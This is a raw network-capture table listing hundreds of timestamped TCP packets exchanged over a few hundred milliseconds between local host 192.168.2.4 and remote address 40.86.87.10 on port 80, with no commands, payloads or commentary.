Jul 2, 2024 07:31:12.678061962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678072929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.678123951 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.678884029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678894997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678905010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678914070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678922892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678931952 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.678932905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678942919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678946018 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.678952932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678962946 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678972960 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.678973913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678985119 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678994894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.678996086 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.679003954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679013968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679013968 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.679023027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679033041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679033995 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.679043055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679052114 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679060936 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.679060936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679085016 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.679085016 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.679114103 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.679874897 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679886103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679896116 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679905891 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679913998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679913998 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.679924011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679934025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679939032 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.679944992 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679954052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679964066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679974079 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679975033 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.679984093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.679984093 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.679994106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.680000067 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.680003881 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.680005074 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.680008888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.680011988 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.680013895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.680023909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.680054903 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.680083990 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.680780888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.680793047 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.680805922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.680816889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.680825949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.680831909 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.680836916 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.680845976 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.680850983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.680856943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.680860996 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.680886030 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.680896044 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.766560078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.766988039 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.794754982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.794775009 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.794785976 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.794809103 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.794842005 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.794934034 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.794945002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.794955969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.794984102 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.795006990 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.795213938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.795224905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.795236111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.795245886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.795257092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.795263052 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.795268059 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.795279026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.795289993 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.795300007 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.795301914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.795309067 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.795331001 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.795356989 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.795547962 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.795558929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.795572042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.795581102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.795595884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.795634985 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796092033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796103001 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796113014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796123981 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796134949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796144009 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796152115 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796154022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796164036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796169043 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796175957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796188116 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796195030 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796243906 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796358109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796369076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796379089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796390057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796395063 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796400070 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796411037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796415091 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796422958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796453953 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796483994 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796674967 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796685934 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796708107 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796717882 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796727896 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796730042 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796739101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796742916 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796750069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796761036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796763897 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796772957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796782017 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796787977 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796793938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796803951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796806097 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796813965 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796824932 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796825886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.796853065 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.796875954 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.797449112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797460079 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797470093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797480106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797483921 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.797491074 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797499895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797503948 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.797511101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797522068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797527075 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.797532082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797542095 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.797542095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797553062 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797557116 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.797564030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797574043 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797585011 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.797585964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797596931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797605038 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.797606945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797617912 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797627926 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.797627926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.797658920 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.797683001 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.798404932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798415899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798425913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798437119 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798446894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798456907 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798466921 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.798466921 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798477888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798489094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798496962 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.798500061 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798511028 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798520088 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.798521996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798527956 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.798532009 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798543930 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798553944 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798553944 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.798564911 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798576117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798577070 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.798585892 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.798604012 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.798624992 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.799290895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799302101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799310923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799320936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799329996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799335003 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.799339056 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799348116 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799356937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799366951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799369097 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.799376011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799386024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799396992 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799401045 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.799406052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799411058 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799418926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799420118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.799427986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799436092 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.799438000 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799447060 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.799474955 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.799493074 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.800175905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.800215006 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.800225019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.800235033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.800245047 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.800251007 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.800254107 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.800267935 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.800276995 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.800293922 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.800331116 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.885385036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.885462999 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.885474920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.885478973 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.885519981 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.885521889 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.885531902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.885543108 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.885554075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.885596991 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.885623932 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.885714054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.885725021 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.885766029 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.885848999 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.885859966 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.885894060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.913889885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.913955927 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.913966894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.913973093 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.914004087 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.914074898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914086103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914096117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914107084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914134026 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.914148092 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.914263010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914274931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914304018 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.914314985 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.914423943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914434910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914446115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914455891 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914467096 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914475918 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.914477110 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914489031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914510012 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.914521933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.914742947 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914753914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914793968 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.914891958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914902925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914911985 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914922953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914932966 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914942026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914944887 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.914959908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914966106 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.914971113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914980888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.914984941 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.915011883 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.915034056 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.915313005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915323973 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915333986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915345907 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915364981 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.915396929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.915445089 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915582895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915595055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915600061 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915602922 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.915610075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915621042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915627003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915637970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915648937 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.915654898 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.915676117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915677071 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.915687084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915697098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915709019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915719032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915721893 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.915728092 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.915735006 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915745974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915756941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915767908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.915769100 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.915801048 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.915862083 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.916543961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916554928 CEST	80	49730	40.86.87.10	192.168.2.4
